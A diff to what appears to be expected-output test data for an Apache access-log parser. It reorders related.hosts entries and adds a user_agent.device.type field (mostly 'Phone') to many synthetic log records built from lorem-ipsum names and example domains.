@@ -2234,9 +2269,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "mail.example.org", - "api.example.com", "https://mail.example.org/oconsequ/edquiac.gif?preh=ercit#etMal", + "api.example.com", + "mail.example.org", "iquidexe304.mail.test" ], "related.ip": [ @@ -2276,6 +2311,7 @@ "url.top_level_domain": "org", "user.name": "uat", "user_agent.device.name": "POCOPHONE F1", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -2342,6 +2378,7 @@ "url.top_level_domain": "com", "user.name": "itesseq", "user_agent.device.name": "Asus X01BDA", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36", "user_agent.os.full": "Android 10", @@ -2403,6 +2440,7 @@ "url.top_level_domain": "net", "user.name": "amvolupt", "user_agent.device.name": "Android", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 5.1.1; Android Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/9.80 YaSearchBrowser/9.80", "user_agent.os.full": "Android 5.1.1", @@ -2427,8 +2465,8 @@ "observer.vendor": "Apache", "related.hosts": [ "mail.example.com", - "api.example.org", - "https://mail.example.com/acommod/itsedd.html?admin=stenatu#inibu" + "https://mail.example.com/acommod/itsedd.html?admin=stenatu#inibu", + "api.example.org" ], "related.ip": [ "10.89.137.238" 
@@ -2465,6 +2503,7 @@ "url.top_level_domain": "com", "user.name": "ore", "user_agent.device.name": "5024D_RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61", "user_agent.os.full": "Android 9", @@ -2488,8 +2527,8 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "https://example.org/Nequepor/eirure.htm?idid=tesse#sequat", "example.org", + "https://example.org/Nequepor/eirure.htm?idid=tesse#sequat", "www5.example.net" ], "related.ip": [ @@ -2526,6 +2565,7 @@ "url.top_level_domain": "org", "user.name": "iusmodte", "user_agent.device.name": "Asus X01BDA", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36", "user_agent.os.full": "Android 10", @@ -2550,9 +2590,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "https://www.example.org/tanimi/rumSecti.jpg?emporain=ntiumto#umetMalo", - "www.example.org", "www5.example.net", + "www.example.org", + "https://www.example.org/tanimi/rumSecti.jpg?emporain=ntiumto#umetMalo", "orin5238.host" ], "related.ip": [ @@ -2592,6 +2632,7 @@ "url.top_level_domain": "org", "user.name": "rcit", "user_agent.device.name": "Asus X01BDA", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36", "user_agent.os.full": "Android 10", 
@@ -2615,9 +2656,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ + "www.example.net", "example.net", - "https://example.net/temUt/ptassita.gif?uamnihi=risnis#uov", - "www.example.net" + "https://example.net/temUt/ptassita.gif?uamnihi=risnis#uov" ], "related.ip": [ "10.69.30.196" @@ -2653,6 +2694,7 @@ "url.top_level_domain": "net", "user.name": "elits", "user_agent.device.name": "Generic Smartphone", + "user_agent.device.type": "Other", "user_agent.name": "Opera Mini", "user_agent.original": "Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16", "user_agent.os.name": "Symbian OS", @@ -2713,6 +2755,7 @@ "url.top_level_domain": "com", "user.name": "eporroq", "user_agent.device.name": "U307AS", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -2737,9 +2780,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "example.net", - "https://example.net/Sedutpe/prehen.html?rcit=aecatcup#olabor", "api.example.org", + "https://example.net/Sedutpe/prehen.html?rcit=aecatcup#olabor", + "example.net", "agnaaliq1829.mail.test" ], "related.ip": [ @@ -2778,6 +2821,7 @@ "url.top_level_domain": "net", "user.name": "fugitse", "user_agent.device.name": "G8142", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", 
@@ -2839,6 +2883,7 @@ "url.top_level_domain": "org", "user.name": "avolu", "user_agent.device.name": "Samsung SM-S337TL", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 7.0; SM-S337TL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 7.0", @@ -2862,8 +2907,8 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "example.com", "api.example.net", + "example.com", "https://api.example.net/mquisn/queips.gif?emUte=molestia#quir" ], "related.ip": [ @@ -2901,6 +2946,7 @@ "url.top_level_domain": "net", "user.name": "henderit", "user_agent.device.name": "U20", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; U20 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.147 Mobile Safari/537.36 YaApp_Android/10.90 YaSearchBrowser/10.90", "user_agent.os.full": "Android 6.0", @@ -2924,9 +2970,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "https://www.example.net/yCic/nder.jpg?itanim=nesciun#saqu", "www.example.org", - "www.example.net" + "www.example.net", + "https://www.example.net/yCic/nder.jpg?itanim=nesciun#saqu" ], "related.ip": [ "10.218.0.197" @@ -2963,6 +3009,7 @@ "url.top_level_domain": "net", "user.name": "econs", "user_agent.device.name": "POCOPHONE F1", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", 
@@ -2987,9 +3034,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "example.com", - "mail.example.com", "https://mail.example.com/ecatcupi/uamei.html?nreprehe=onse#olorem", + "mail.example.com", + "example.com", "iatqu7310.api.home" ], "related.ip": [ @@ -3029,6 +3076,7 @@ "url.top_level_domain": "com", "user.name": "illumqui", "user_agent.device.name": "Asus X01BDA", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36", "user_agent.os.full": "Android 10", @@ -3054,8 +3102,8 @@ "observer.vendor": "Apache", "related.hosts": [ "internal.example.net", - "https://internal.example.net/ection/roquisqu.html?ceroinB=nim#utaliqu", "example.org", + "https://internal.example.net/ection/roquisqu.html?ceroinB=nim#utaliqu", "uamnihil6127.api.domain" ], "related.ip": [ @@ -3095,6 +3143,7 @@ "url.top_level_domain": "net", "user.name": "leumiur", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Yandex Browser", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 YaBrowser/20.3.0.2221 Yowser/2.5 Safari/537.36", "user_agent.os.full": "Mac OS X 10.15.6", @@ -3119,9 +3168,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "www.example.org", - "mail.example.net", "https://mail.example.net/iutali/itat.txt?Finibus=radi#xeacom", + "mail.example.net", + "www.example.org", "uov1629.internal.invalid" ], "related.ip": [ 
@@ -3161,6 +3210,7 @@ "url.top_level_domain": "net", "user.name": "quaU", "user_agent.device.name": "U307AS", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -3184,8 +3234,8 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "https://mail.example.net/lmolesti/apariatu.htm?moe=msequ#uat", "internal.example.org", + "https://mail.example.net/lmolesti/apariatu.htm?moe=msequ#uat", "mail.example.net" ], "related.ip": [ @@ -3223,6 +3273,7 @@ "url.top_level_domain": "net", "user.name": "eosquira", "user_agent.device.name": "Samsung SM-A260G", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile WebView", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36", "user_agent.os.full": "Android 8.1.0", @@ -3289,6 +3340,7 @@ "url.top_level_domain": "org", "user.name": "tiumto", "user_agent.device.name": "G8142", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -3351,6 +3403,7 @@ "url.top_level_domain": "net", "user.name": "tesseq", "user_agent.device.name": "ZTE Blade V1000RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; ZTE Blade V1000RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91", "user_agent.os.full": "Android 9", 
@@ -3375,8 +3428,8 @@ "observer.vendor": "Apache", "related.hosts": [ "example.org", - "internal.example.com", - "https://example.org/pisc/urEx.html?rautod=olest#eataev" + "https://example.org/pisc/urEx.html?rautod=olest#eataev", + "internal.example.com" ], "related.ip": [ "10.5.194.202" @@ -3412,6 +3465,7 @@ "url.top_level_domain": "org", "user.name": "ntmo", "user_agent.device.name": "LM-V350", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; LM-V350) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 10", @@ -3436,8 +3490,8 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "https://www5.example.com/aconse/prehe.gif?diduntu=eiusmod#itation", "www.example.org", + "https://www5.example.com/aconse/prehe.gif?diduntu=eiusmod#itation", "www5.example.com", "deriti6952.mail.domain" ], @@ -3478,6 +3532,7 @@ "url.top_level_domain": "com", "user.name": "isn", "user_agent.device.name": "Samsung GT-P3100 ", + "user_agent.device.type": "Tablet", "user_agent.name": "Android", "user_agent.original": "Mozilla/5.0 (Linux; U; Android 4.0.3; es-us; GT-P3100 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30", "user_agent.os.full": "Android 4.0.3", @@ -3501,8 +3556,8 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "mail.example.net", "internal.example.com", + "mail.example.net", "https://mail.example.net/reetdolo/rationev.html?reetdol=uelauda#ema" ], "related.ip": [ @@ -3540,6 +3595,7 @@ "url.top_level_domain": "net", "user.name": "nBCSe", "user_agent.device.name": "Micromax P410i", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36", "user_agent.os.full": "Android 4.1.2", 
@@ -3565,8 +3621,8 @@ "observer.vendor": "Apache", "related.hosts": [ "internal.example.com", - "www5.example.com", "https://www5.example.com/mUteni/quira.htm?ore=tation#loinve", + "www5.example.com", "nse3421.mail.localhost" ], "related.ip": [ @@ -3606,6 +3662,7 @@ "url.top_level_domain": "com", "user.name": "ugitsedq", "user_agent.device.name": "Samsung SM-A260G", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile WebView", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36", "user_agent.os.full": "Android 8.1.0", @@ -3629,9 +3686,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "www5.example.org", + "https://www5.example.org/setquas/minim.gif?tutlabor=reseosq#gna", "mail.example.net", - "https://www5.example.org/setquas/minim.gif?tutlabor=reseosq#gna" + "www5.example.org" ], "related.ip": [ "10.94.140.77" @@ -3668,6 +3725,7 @@ "url.top_level_domain": "org", "user.name": "isnisiu", "user_agent.device.name": "Generic Smartphone", + "user_agent.device.type": "Other", "user_agent.name": "Opera Mini", "user_agent.original": "Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16", "user_agent.os.name": "Symbian OS", @@ -3689,9 +3747,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "https://www.example.com/laudanti/umiurer.txt?rsitvolu=mnisi#usmo", "mail.example.org", - "www.example.com" + "www.example.com", + "https://www.example.com/laudanti/umiurer.txt?rsitvolu=mnisi#usmo" ], "related.ip": [ "10.223.205.204" 
@@ -3728,6 +3786,7 @@ "url.top_level_domain": "com", "user.name": "ccaec", "user_agent.device.name": "Samsung SM-A260G", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile WebView", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36", "user_agent.os.full": "Android 8.1.0", @@ -3752,9 +3811,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ + "example.com", "mail.example.org", "https://mail.example.org/ici/nisiuta.jpg?itae=dtempo#atnula", - "example.com", "tautfug689.localdomain" ], "related.ip": [ @@ -3794,6 +3853,7 @@ "url.top_level_domain": "org", "user.name": "serror", "user_agent.device.name": "LG-$2", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -3818,9 +3878,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ + "www5.example.net", "mail.example.com", "https://mail.example.com/eseruntm/lpaquiof.html?magnaal=uscip#umS", - "www5.example.net", "totam6886.api.localhost" ], "related.ip": [ @@ -3860,6 +3920,7 @@ "url.top_level_domain": "com", "user.name": "liquam", "user_agent.device.name": "LG-$2", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -3883,9 +3944,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ + "https://example.net/labori/porai.gif?utali=sed#xeac", "internal.example.org", - "example.net", - "https://example.net/labori/porai.gif?utali=sed#xeac" + "example.net" ], "related.ip": [ "10.158.6.52" 
@@ -3921,6 +3982,7 @@ "url.top_level_domain": "net", "user.name": "sed", "user_agent.device.name": "XiaoMi Redmi 4X", + "user_agent.device.type": "Phone", "user_agent.name": "MiuiBrowser", "user_agent.original": "Mozilla/5.0 (Linux; U; Android 7.1.2; uz-uz; Redmi 4X Build/N2G47H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.141 Mobile Safari/537.36 XiaoMi/MiuiBrowser/12.2.3-g", "user_agent.os.full": "Android 7.1.2", @@ -3946,8 +4008,8 @@ "observer.vendor": "Apache", "related.hosts": [ "example.com", - "https://www5.example.org/orissu/fic.gif?ese=mmodoco#amni", "www5.example.org", + "https://www5.example.org/orissu/fic.gif?ese=mmodoco#amni", "tquo854.api.domain" ], "related.ip": [ @@ -3987,6 +4049,7 @@ "url.top_level_domain": "org", "user.name": "urerepre", "user_agent.device.name": "ZTE BLADE V7", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 6.0", @@ -4049,6 +4112,7 @@ "url.top_level_domain": "com", "user.name": "quas", "user_agent.device.name": "ZTE BLADE V7", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 6.0", @@ -4115,6 +4179,7 @@ "url.top_level_domain": "com", "user.name": "iti", "user_agent.device.name": "Lenovo A2016a40 ", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30", "user_agent.os.full": "Android 6.0", 
@@ -4139,9 +4204,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "https://www.example.net/ntorever/pisciv.gif?eritq=rehen#ipsamvol", - "www.example.net", "example.com", + "www.example.net", + "https://www.example.net/ntorever/pisciv.gif?eritq=rehen#ipsamvol", "veniam1216.www5.invalid" ], "related.ip": [ @@ -4181,6 +4246,7 @@ "url.top_level_domain": "net", "user.name": "ugiat", "user_agent.device.name": "Spider", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) yahoo.adquality.lwd.desktop/1591143192-10" }, @@ -4201,8 +4267,8 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "www5.example.com", "https://www5.example.com/quu/xeac.htm?abor=oreverit#scip", + "www5.example.com", "runtm5729.invalid" ], "related.ip": [ @@ -4242,6 +4308,7 @@ "url.top_level_domain": "com", "user.name": "ptate", "user_agent.device.name": "5024D_RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61", "user_agent.os.full": "Android 9", @@ -4266,8 +4333,8 @@ "observer.vendor": "Apache", "related.hosts": [ "www5.example.net", - "www.example.net", - "https://www.example.net/mini/Loremip.html?tur=atnonpr#ita" + "https://www.example.net/mini/Loremip.html?tur=atnonpr#ita", + "www.example.net" ], "related.ip": [ "10.187.152.213" 
@@ -4304,6 +4371,7 @@ "url.top_level_domain": "net", "user.name": "ventor", "user_agent.device.name": "Notepad_K10", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36", "user_agent.os.full": "Android 9", @@ -4329,8 +4397,8 @@ "observer.vendor": "Apache", "related.hosts": [ "www.example.net", - "internal.example.net", "https://www.example.net/duntutla/lamco.txt?isci=Dui#reetdo", + "internal.example.net", "pta6012.www.local" ], "related.ip": [ @@ -4370,6 +4438,7 @@ "url.top_level_domain": "net", "user.name": "fugitse", "user_agent.device.name": "Micromax P410i", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36", "user_agent.os.full": "Android 4.1.2", @@ -4394,8 +4463,8 @@ "observer.vendor": "Apache", "related.hosts": [ "www5.example.net", - "https://www5.example.net/tev/nre.html?occaeca=eturadip#ent", - "www5.example.org" + "www5.example.org", + "https://www5.example.net/tev/nre.html?occaeca=eturadip#ent" ], "related.ip": [ "10.86.123.33" @@ -4432,6 +4501,7 @@ "url.top_level_domain": "net", "user.name": "meum", "user_agent.device.name": "XiaoMi Redmi 4X", + "user_agent.device.type": "Phone", "user_agent.name": "MiuiBrowser", "user_agent.original": "Mozilla/5.0 (Linux; U; Android 7.1.2; uz-uz; Redmi 4X Build/N2G47H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.141 Mobile Safari/537.36 XiaoMi/MiuiBrowser/12.2.3-g", "user_agent.os.full": "Android 7.1.2", 
@@ -4455,9 +4525,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "https://www5.example.net/uamnih/nseq.txt?uidolo=umdolore#dmi", + "www5.example.net", "api.example.net", - "www5.example.net" + "https://www5.example.net/uamnih/nseq.txt?uidolo=umdolore#dmi" ], "related.ip": [ "10.6.112.183" @@ -4494,6 +4564,7 @@ "url.top_level_domain": "net", "user.name": "oluptat", "user_agent.device.name": "LM-V350", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; LM-V350) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 10", @@ -4519,8 +4590,8 @@ "observer.vendor": "Apache", "related.hosts": [ "www5.example.org", - "https://example.net/umdolor/isiu.html?mmodi=snostr#eniamqu", "example.net", + "https://example.net/umdolor/isiu.html?mmodi=snostr#eniamqu", "orsi2109.internal.home" ], "related.ip": [ @@ -4559,6 +4630,7 @@ "url.top_level_domain": "net", "user.name": "idolo", "user_agent.device.name": "Spider", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) yahoo.adquality.lwd.desktop/1591143192-10" }, @@ -4579,9 +4651,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ + "example.net", "example.org", "https://example.org/ibusBo/untincu.jpg?lesti=sintocca#mipsumqu", - "example.net", "quaeabil2539.www5.lan" ], "related.ip": [ @@ -4620,6 +4692,7 @@ "url.top_level_domain": "org", "user.name": "quide", "user_agent.device.name": "ZTE BLADE V7", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 6.0", 
@@ -4644,9 +4717,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "www5.example.net", "www5.example.org", "https://www5.example.org/magnaa/sumquiad.gif?oluptate=Duisa#consequa", + "www5.example.net", "aal1598.mail.host" ], "related.ip": [ @@ -4686,6 +4759,7 @@ "url.top_level_domain": "org", "user.name": "upta", "user_agent.device.name": "VS996", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 8.0.0", @@ -4709,9 +4783,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "api.example.net", "www.example.org", - "https://www.example.org/evolup/rvelil.gif?eavolup=ipsumq#evit" + "https://www.example.org/evolup/rvelil.gif?eavolup=ipsumq#evit", + "api.example.net" ], "related.ip": [ "10.37.156.140" @@ -4748,6 +4822,7 @@ "url.top_level_domain": "org", "user.name": "olores", "user_agent.device.name": "Generic Smartphone", + "user_agent.device.type": "Other", "user_agent.name": "Opera Mini", "user_agent.original": "Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16", "user_agent.os.name": "Symbian OS", @@ -4769,9 +4844,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "www5.example.org", + "https://example.com/oremip/its.jpg?iavol=natuserr#ostrudex", "example.com", - "https://example.com/oremip/its.jpg?iavol=natuserr#ostrudex" + "www5.example.org" ], "related.ip": [ "10.121.225.135" 
@@ -4807,6 +4882,7 @@ "url.top_level_domain": "com", "user.name": "cin", "user_agent.device.name": "5024D_RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61", "user_agent.os.full": "Android 9", @@ -4830,9 +4906,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ + "www.example.org", "mail.example.net", - "https://www.example.org/animid/upta.jpg?onnumqua=quioff#iuntN", - "www.example.org" + "https://www.example.org/animid/upta.jpg?onnumqua=quioff#iuntN" ], "related.ip": [ "10.123.68.56" @@ -4869,6 +4945,7 @@ "url.top_level_domain": "org", "user.name": "olore", "user_agent.device.name": "Asus X01BDA", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36", "user_agent.os.full": "Android 10", @@ -4893,8 +4970,8 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "api.example.net", "https://api.example.net/itesse/expl.html?prehende=lup#tpers", + "api.example.net", "mail.example.net", "oid218.api.invalid" ], @@ -4935,6 +5012,7 @@ "url.top_level_domain": "net", "user.name": "evo", "user_agent.device.name": "Micromax P410i", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36", "user_agent.os.full": "Android 4.1.2", 
@@ -4959,9 +5037,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "https://example.net/deritinv/evelite.html?iav=odico#rsint", - "example.net", "example.com", + "example.net", + "https://example.net/deritinv/evelite.html?iav=odico#rsint", "sectetur2674.www5.test" ], "related.ip": [ @@ -5000,6 +5078,7 @@ "url.top_level_domain": "net", "user.name": "deomnisi", "user_agent.device.name": "Samsung SM-A305FN", + "user_agent.device.type": "Phone", "user_agent.name": "YandexSearch", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; SM-A305FN Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36 YandexSearch/8.10 YandexSearchBrowser/8.10", "user_agent.os.full": "Android 10", @@ -5024,8 +5103,8 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ - "api.example.net", "https://example.org/tseddoei/teursint.htm?remagnaa=lamcolab#ceroinB", + "api.example.net", "example.org", "sequatD4487.internal.localhost" ], @@ -5065,6 +5144,7 @@ "url.top_level_domain": "org", "user.name": "nimv", "user_agent.device.name": "VS996", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 8.0.0", @@ -5088,9 +5168,9 @@ "observer.type": "Web", "observer.vendor": "Apache", "related.hosts": [ + "api.example.org", "www5.example.com", - "https://www5.example.com/ciad/ugiatqu.gif?turveli=isciv#natus", - "api.example.org" + "https://www5.example.com/ciad/ugiatqu.gif?turveli=isciv#natus" ], "related.ip": [ "10.122.252.130" 
